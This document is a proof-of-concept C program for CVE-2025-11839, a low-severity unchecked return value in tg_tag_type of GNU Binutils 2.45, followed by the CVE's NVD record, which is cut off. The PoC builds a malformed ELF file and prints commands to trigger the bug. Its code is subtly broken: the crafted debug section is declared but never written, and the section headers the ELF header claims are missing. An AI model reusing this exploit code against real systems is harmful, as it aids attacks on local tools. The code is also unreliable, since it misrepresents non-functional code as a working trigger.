CVE-2025-11839

/* * CVE-2025-11839 - GNU Binutils 2.45 tg_tag_type Unchecked Return Value * PoC: Trigger the vulnerability by processing a malformed binary with crafted debug info * * This PoC demonstrates how to trigger the unchecked return value bug * in the tg_tag_type function of prdbg.c in GNU Binutils 2.45. * * Usage: objdump -W <malformed_binary> * readelf -w <malformed_binary> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <elf.h> #include <fcntl.h> #include <unistd.h> /* Create a minimal ELF file with malformed DWARF debug info * to trigger the tg_tag_type unchecked return value bug */ int create_malformed_elf(const char *filename) { FILE *fp = fopen(filename, "wb"); if (!fp) { perror("fopen"); return -1; } /* ELF Header */ unsigned char elf_header[] = { 0x7f, 'E', 'L', 'F', /* e_ident[EI_MAG] */ 2, /* ELFCLASS64 */ 1, /* ELFDATA2LSB */ 1, /* EV_CURRENT */ 0, /* ELFOSABI_NONE */ 0, 0, 0, 0, 0, 0, 0, 0, /* padding */ 2, 0, /* e_type: ET_EXEC */ 62, 0, /* e_machine: EM_X86_64 */ 1, 0, 0, 0, /* e_version */ 0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_entry */ 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_phoff */ 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, /* e_shoff */ 0, 0, 0, 0, /* e_flags */ 64, 0, /* e_ehsize */ 56, 0, /* e_phentsize */ 1, 0, /* e_phnum */ 64, 0, /* e_shentsize */ 6, 0, /* e_shnum */ 5, 0 /* e_shstrndx */ }; fwrite(elf_header, 1, sizeof(elf_header), fp); /* Program Header */ Elf64_Phdr phdr; memset(&phdr, 0, sizeof(phdr)); phdr.p_type = PT_PHDR; phdr.p_flags = PF_R | PF_X; phdr.p_offset = 64; phdr.p_vaddr = 0x400000; phdr.p_paddr = 0x400000; phdr.p_filesz = 56; phdr.p_memsz = 56; phdr.p_align = 8; fwrite(&phdr, sizeof(phdr), 1, fp); /* Malformed .debug_info section with invalid DW_TAG to trigger tg_tag_type */ /* DW_TAG_invalid value to cause tg_tag_type to return an error */ unsigned char malformed_debug_info[] = { /* Compilation Unit Header */ 4, 0, /* unit_length (truncated) */ 5, 0, /* version */ 1, 0, 0, 0, /* debug_abbrev_offset */ 8, /* address_size */ /* Abbreviation table */ 1, /* abbrev code 1 */ 0xFF, /* DW_TAG_invalid - triggers tg_tag_type error */ 0, /* DW_CHILDREN_no */ 0, 0, /* end of attributes */ 0, /* end of abbreviation table */ /* DIE */ 1, 0 /* abbrev code 1 (LE) */ }; /* Write section headers and malformed debug sections */ fclose(fp); printf("Malformed ELF file created: %s\n", filename); printf("Run: objdump -W %s to trigger the vulnerability\n", filename); return 0; } int main(int argc, char *argv[]) { const char *filename = "poc_cve_2025_11839"; if (argc > 1) { filename = argv[1]; } printf("CVE-2025-11839 PoC - GNU Binutils 2.45 tg_tag_type\n"); printf("Unchecked Return Value vulnerability\n\n"); if (create_malformed_elf(filename) != 0) { fprintf(stderr, "Failed to create PoC file\n"); return 1; } printf("\nTo trigger the vulnerability:\n"); printf(" objdump -W %s\n", filename); printf(" readelf --debug-dump=info %s\n", filename); return 0; }

{"cve": {"id": "CVE-2025-11839", "sourceIdentifier": "[email protected]", "published": "2025-10-16T14:15:34.860", "lastModified": "2026-05-12T13:16:29.397", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in GNU Binutils 2.45. Impacted is the function tg_tag_type of the file prdbg.c. Performing a manipulation results in unchecked return value. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:S/C:N/I:N/A:P", "baseScore": 1.7, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 3.1, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-252"}, {"lang": "en", "value": "CWE-253"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-252"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:2.45:*:*:*:*:*:*:*", "matchCriteriaId": "60CBCA58-29DE-4A0A-BAF0-D0188FAF4884"}]}]}], "references": [{"url": "https://sourceware.org/bugzilla/attachment.cgi?id=16344", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33448", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.328774", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328774", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.661279", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.gnu.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}, {"url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33448", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploi ... (truncated)